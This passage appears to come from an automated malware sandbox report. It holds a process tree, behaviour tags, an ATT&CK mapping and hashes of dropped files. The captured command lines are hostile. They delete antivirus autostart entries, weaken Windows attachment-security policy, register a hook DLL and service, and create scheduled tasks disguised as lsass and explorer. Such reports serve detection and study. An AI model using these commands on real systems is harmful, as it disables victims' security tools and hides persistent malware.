"%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵
-
C:\Users\Admin\AppData\Local\Temp\2FFE.exeC:\Users\Admin\AppData\Local\Temp\2FFE.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\2FFE.exeC:\Users\Admin\AppData\Local\Temp\2FFE.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4675.exeC:\Users\Admin\AppData\Local\Temp\4675.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\cheat.exe"C:\Users\Admin\AppData\Local\Temp\cheat.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4ADB.exeC:\Users\Admin\AppData\Local\Temp\4ADB.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 7322⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 7762⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 7802⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 8922⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 8882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\4FCE.exeC:\Users\Admin\AppData\Local\Temp\4FCE.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 7322⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 7362⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 7202⤵
- Program crash
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 7362⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 8802⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\catsrvps\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fsucenter" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_215406\fsucenter.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\resources\ShellExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\regedit\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\wcnwiz\WerFault.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\install.exeMD5
3319cb474eaa2f3812956b271ff29635
SHA174fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA25679d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Data\install.exeMD5
3319cb474eaa2f3812956b271ff29635
SHA174fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA25679d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Runtimebroker.exeMD5
8fdc2723951d30a7e286376dc51d7cfb
SHA1ce0166b27145cd60f8c6b6c681a6c15c14a8728a
SHA2563fd0bc35561d9572ae825042276b8b809371ac9ebdd6bde71e67f9f86117e560
SHA512ab4afdb4555a56be5079630d0e8cf5b7648c110dcf365caabfb61cef692038ed30f04976219a127d81dd3d1ec474494eeb360b9a487a6f307f866e07eab39b67
-
C:\ProgramData\Runtimebroker.exeMD5
8fdc2723951d30a7e286376dc51d7cfb
SHA1ce0166b27145cd60f8c6b6c681a6c15c14a8728a
SHA2563fd0bc35561d9572ae825042276b8b809371ac9ebdd6bde71e67f9f86117e560
SHA512ab4afdb4555a56be5079630d0e8cf5b7648c110dcf365caabfb61cef692038ed30f04976219a127d81dd3d1ec474494eeb360b9a487a6f307f866e07eab39b67
-
C:\ProgramData\Systemd\HostData.exeMD5
cbf26c74a0a12b5f17ba7596ff6ad19f
SHA16dc733432c290f1fbf5ddda2571b7f538445202b
SHA256095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA5128a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\HostData.exeMD5
cbf26c74a0a12b5f17ba7596ff6ad19f
SHA16dc733432c290f1fbf5ddda2571b7f538445202b
SHA256095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA5128a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\config.jsonMD5
a285ac140c8c6806223bfdc02302173e
SHA106ca61cae058c568860858e49615d04dc4a8820d
SHA25636d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb
SHA512f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
6bf0e5945fb9da68e1b03bdaed5f6f8d
SHA1eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
SHA256dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
SHA512977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
f6425b20b38442ab0e1f3e8f62f20e6a
SHA15cbb7c79feaa66759ac2ad55e88e535da9679ad9
SHA256306673f9a8153de58afee9837af2f86f4b428f7f09f087726ecffa3ac3f08401
SHA51250cedd4826e0a0308cd43c7896ac3e4b053e525ab9e9fb23346b2f1cc827928a75e23973b98fc26787257e80ed43b2ce58fb3b5bd20f872300736de9a45464a7
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
d964be3827f16b67c1f67dc18c046f76
SHA15dcaac1e9590cd38407631d676de7ce9cb6d82d2
SHA256672c7f9d94d668f829811cf61bbf575197c77ee40f32a34990ff92d65352b88c
SHA512e3e04c7b0938984273d473c1137c071ffa1022065f5ceb3528d9641350987ebff85de80ed4eec6313726a48531113c133d560d6a92786d9c1acf7ff08e79a1ad
-
C:\Users\Admin\AppData\Local\Temp\1974.exeMD5
a69e12607d01237460808fa1709e5e86
SHA14a12f82aee1c90e70cdf6be863ce1a749c8ae411
SHA256188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc
SHA5127533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284
-
C:\Users\Admin\AppData\Local\Temp\1974.exeMD5
a69e12607d01237460808fa1709e5e86
SHA14a12f82aee1c90e70cdf6be863ce1a749c8ae411
SHA256188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc
SHA5127533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284
-
C:\Users\Admin\AppData\Local\Temp\1EE4.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\1EE4.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\1EE4.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\28A9.exeMD5
49f58a80993170b4351014d0b5068897
SHA17af2615ec10821cbefb55c602b270c27fa1d6806
SHA256905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c
SHA5122ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2
-
C:\Users\Admin\AppData\Local\Temp\28A9.exeMD5
49f58a80993170b4351014d0b5068897
SHA17af2615ec10821cbefb55c602b270c27fa1d6806
SHA256905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c
SHA5122ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2
-
C:\Users\Admin\AppData\Local\Temp\2CF0.exeMD5
8fdc2723951d30a7e286376dc51d7cfb
SHA1ce0166b27145cd60f8c6b6c681a6c15c14a8728a
SHA2563fd0bc35561d9572ae825042276b8b809371ac9ebdd6bde71e67f9f86117e560
SHA512ab4afdb4555a56be5079630d0e8cf5b7648c110dcf365caabfb61cef692038ed30f04976219a127d81dd3d1ec474494eeb360b9a487a6f307f866e07eab39b67
-
C:\Users\Admin\AppData\Local\Temp\2CF0.exeMD5
8fdc2723951d30a7e286376dc51d7cfb
SHA1ce0166b27145cd60f8c6b6c681a6c15c14a8728a
SHA2563fd0bc35561d9572ae825042276b8b809371ac9ebdd6bde71e67f9f86117e560
SHA512ab4afdb4555a56be5079630d0e8cf5b7648c110dcf365caabfb61cef692038ed30f04976219a127d81dd3d1ec474494eeb360b9a487a6f307f866e07eab39b67
-
C:\Users\Admin\AppData\Local\Temp\2FFE.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
